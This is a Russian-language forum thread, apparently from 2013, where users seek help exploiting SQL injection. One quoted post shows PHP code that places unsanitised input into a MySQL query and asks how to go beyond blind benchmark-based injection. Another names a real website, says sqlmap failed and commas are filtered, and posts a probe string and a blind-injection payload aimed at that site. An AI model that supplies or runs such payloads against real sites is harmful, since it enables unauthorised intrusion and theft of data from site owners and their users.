
05.10.2013, 11:39
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от psihoz26
Код:
$result = mysql_query("SELECT * FROM profiles where login = '$username' and sa = '$otvet_na_vopros' and sq = '$u2'") or die("niiiii");
тут только в слепую крутить получается через benchmark
в других же случаях выдает niiiii =\
подскажите как ещё попробовать??
Зависит от того, что потом происходит с данными из $result.
Сообщение от Massay
Помогите раскрутить, через sqlmap не получается у меня.
info(.)dra(c)onic(.)ru/?part=npcs&id=95%27%22\%27\%22\ - без ( )
Запятые вырезаются
http://info.draconic.ru/?part=npcs&id=95 and mid(version()from 1 for 1)=5
|
|
|